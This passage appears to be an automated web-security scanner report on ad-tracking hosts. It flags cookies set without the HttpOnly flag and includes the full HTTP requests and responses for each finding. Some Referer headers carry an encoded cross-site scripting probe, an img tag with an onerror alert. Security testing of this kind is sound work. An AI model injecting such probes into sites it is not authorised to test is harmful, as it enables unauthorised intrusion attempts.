Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:24:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web203
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_744594694=http://www.gather.com/; domain=c.gigcount.com; path=/
Set-Cookie: GF_744594694=http://www.gather.com/; domain=gigya.com; path=/
Set-Cookie: GP_13160973479891316097351091=744594694; domain=c.gigcount.com; path=/
Set-Cookie: GP_13160973479891316097351091=744594694; domain=gigya.com; path=/
Set-Cookie: UUID=b96e6031736a41419c1ebe18a28d401c; domain=c.gigcount.com; expires=Fri, 17-Sep-2021 16:24:46 GMT; path=/
Set-Cookie: UUID=b96e6031736a41419c1ebe18a28d401c; domain=gigya.com; expires=Fri, 17-Sep-2021 16:24:46 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
13.96. http://cdn4.specificclick.net/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn4.specificclick.net
Path:   /optout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.php HTTP/1.1
Host: cdn4.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ug=UKodabAN_aFXxA

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:48:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: ug=deleted; expires=Fri, 17-Sep-2010 16:48:28 GMT; path=/
Location: http://notrack.specificclick.net/CookieCheck.php?optThis=1&cdn4=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.97. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJWslJSqgUACLkB7g%3D%3D; OABLOCK=785.1315190256_3841.1316036511; OACAP=785.14_3841.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; tpro=eJyVUctuxCAQ%2B5c5oy2EvO899gvaCiFCEqQEVoStVEX5986wTbfXvY0t4%2FGYHa4xjG6x0O8wWT%2FYSNOqieGXSjAY7YnK7mCgp6yVShTEcVQIBE0GNYJWyZKA7BjISpVdBhWDiqvrctsIFmgUtclORt8McV2L5mNUej199ea0R8Bgdtv1ZEOaKSRHCzO7ZYjWk40PJGgKBt%2F2vqNFhfMmrHkNV5ITLSTG4qrOoMBYNVeC8zMkjo%2BUDe0Iy2LvN%2Fvgf3v4RyPEq6eoB7WZOYesDny3uUQ53vc8QQ9vdnD64%2BXVJxuTdn61PgEemaAXUtRc1pXAXp7R10%2FqW3F8%2FhWIv5wcdfPYzmANgzLh5ukRgy8bNxewXhAXDsfxA9vRnzQ%3D; ljt_csync=rtb_turn%3A1316036512%2Crtb_simplifi%3A1316036512%2Crtb_mmath%3A1316036512%2C1%3A1316036512%2Crtb_media6%3A1316036512

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:11 GMT
Server: PWS/1.7.3.6
X-Px: ms sea-ag1-n11 ( sea-ag1-n10), ms sea-ag1-n10 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sun, 18 Sep 2011 16:31:11 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; expires=Sun, 16-Sep-2012 16:31:11 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;
13.98. http://cm.npc-hearst.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=2130893885&type=home_page&ctxtId=home_page&keywordCharEnc=utf8&source=npc_hearst_stamfordadvocate_t2_ctxt&adwd=171&adht=630&ctxtUrl=http%3A%2F%2Fwww.stamfordadvocate.com%2F&css_url=http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.css&refUrl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php&du=1&cb=1316294655906&ctxtContent=%3Chead%3E%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.google-analytics.com%2Fga.js%22%3E%3C%2Fscript%3E%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A18%3A09%20on%20prodWCM3%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22sa%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20%3C HTTP/1.1
Host: cm.npc-hearst.overture.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMnF0tnc1cAC6ZN1ww=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjCycjNzcAJwJN0Aw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Tue, 14-Sep-2021 16:23:04 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
13.99. http://csc.beap.ad.yieldmanager.net/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?bv=1.0.0&bs=(124el92pc(gid$a78650b2-e14c-11e0-aeb6-07f6c2bc03a4,st$1316278016547084,v$1.0))&t=blank&al=(as$1280kupg6,aid$WMPhOWKIDaI-,bi$857648551,ct$25,at$0) HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=259&v=3&yoo=1&XTS=1316220782&XSIG=YpE90BW6SHTET2hMbIUWLF9ax8Y-; BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=259; S=s=014f64p779iba&t=1316276586

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=brtc6mh779jo3&t=1316278019;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
13.100. http://d.agkn.com/iframe!t=747!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /iframe!t=747!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=747!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=1503492&ent=5621714,65464024,242752145,41491013 HTTP/1.1
Host: d.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=3597907?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:39:39 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 239
Date: Sat, 17 Sep 2011 16:39:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">

</head>

<body style="border: 0; margin:
...[SNIP]...
13.101. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: uid=3716466541868853559

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3716466541868853559; Domain=.p-td.com; Expires=Thu, 15-Mar-2012 16:42:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:42:09 GMT

GIF89a.............!.......,...........D..;
13.102. http://d.p-td.com/r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID HTTP/1.1
Host: d.p-td.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=92044374
Cookie: uid=3716466541868853559

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3716466541868853559; Domain=.p-td.com; Expires=Thu, 15-Mar-2012 16:35:40 GMT; Path=/
Location: http://d.turn.com/r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559
Content-Length: 0
Date: Sat, 17 Sep 2011 16:35:39 GMT

13.103. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.turn.com
Path:   /r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9 HTTP/1.1
Host: d.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9tYXAubWVkaWE2ZGVncmVlcy5jb20vb3Jic2Vydi9oYnBpeD9waXhJZD02MjQ5JnBjdj00NyZwdGlkPTEwMiZ0cHY9MDAmdHB1PTAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2QudHVybi5jb20vci9kZC9pZC9MMk56YVdRdk1TOWphV1F2TXpjeE5qa3pNUzkwTHpJL2RwdWlkLzAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0wMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2NtLmcuZG91YmxlY2xpY2submV0L3BpeGVsP25pZD1leGVsYXRlJmo9MCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDA3MzgmbXRfZGNpZD0zODImdjE9JnYyPSZ2Mz0mczE9JnMyPSZzMyIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=270f3051e489add843c2c665150bbcc2
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:35:40 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:35:40 GMT

GIF89a.............!.......,...........D..;
13.104. http://d.turn.com/r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.turn.com
Path:   /r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559 HTTP/1.1
Host: d.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=92044374
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:35:41 GMT; Path=/
Location: http://tags.bluekai.com/site/2800?id=3716466541868853559
Content-Length: 0
Date: Sat, 17 Sep 2011 16:35:40 GMT

13.105. http://d7.zedo.com/bar/v16-507/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-507/d3/jsc/gl.js?mLs5ThcyantsGCRD8ld6EMRU~080311 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=108;s=23;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBv5EW4c10TvnKJYHEjQSIhYGOCbjvnLsCAAAAEAEgADgAWIDJ4IomYMkGggEXY2EtcHViLTM4Nzc4Mzk5OTA4ODM1NDSyAQ53d3cuZ2F0aGVyLmNvbboBCWdmcF9pbWFnZcgBCdoBpgFodHRwOi8vd3d3LmdhdGhlci5jb20vNDI2ZDglM0NpbWclMjBzcmMlM0RhJTIwb25lcnJvciUzRGFsZXJ0KDEpJTNFMzFiN2M2MDY1ZDY3YWRhOWQ_cmVjZW50SWQ9MTY4ODg0OTg4OTI0MTk2MyZxdWFsaXR5Q29tbWVudFdpZHRoPTM1MCZ1cmw9aHR0cDovL3d3dy5nYXRoZXIuY29tJTJGJl894AECwAIC4AIA6gIPNjQ5Ni9nYXRoZXIuY29t-ALw0R6AAwGQA9AFmAPgA6gDAeAEAaAGFg%26num%3D0%26sig%3DAOD64_32XMtgfOze2kI-VZyCpPKOdmdRqw%26client%3Dca-pub-3877839990883544%26adurl%3D
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B305,20|145_2#371Z494_1#392Z458_1#371:809,20|10_1#365Z3_1#392; FFBbh=962B305,20|145_2#3Z494_1#37Z458_1#0:809,20|10_1#0Z3_1#15; FFMCap=2457960B933,196008:826,114248|0,1#0,24:1,1#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 454
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sun, 16 Sep 2012 17:04:53 GMT;domain=.zedo.com;path=/;
ETag: "aa1bac-616-4accb5a68d180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=382888
Expires: Thu, 22 Sep 2011 03:26:21 GMT
Date: Sat, 17 Sep 2011 17:04:53 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-us';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...
13.106. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1432
Cookie: FFgeo=5386156; ZFFBbh=990B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B305,20|145_2#371Z494_1#392Z458_1#371:809,20|10_1#365Z3_1#392; FFBbh=962B305,20|145_2#3Z494_1#37Z458_1#0:809,20|10_1#0Z3_1#15; FFMCap=2457960B933,196008:826,114248:1432,215162|0,15#0,24:1,1#0,24:0,15#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246; ZEDOIDX=21; FFcat=933,56,15:826,616,14:1432,1,14:1302,108,9; FFad=0:0:0:0; aps=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369;expires=Fri, 16 Dec 2011 16:44:17 GMT;domain=.zedo.com;path=/;
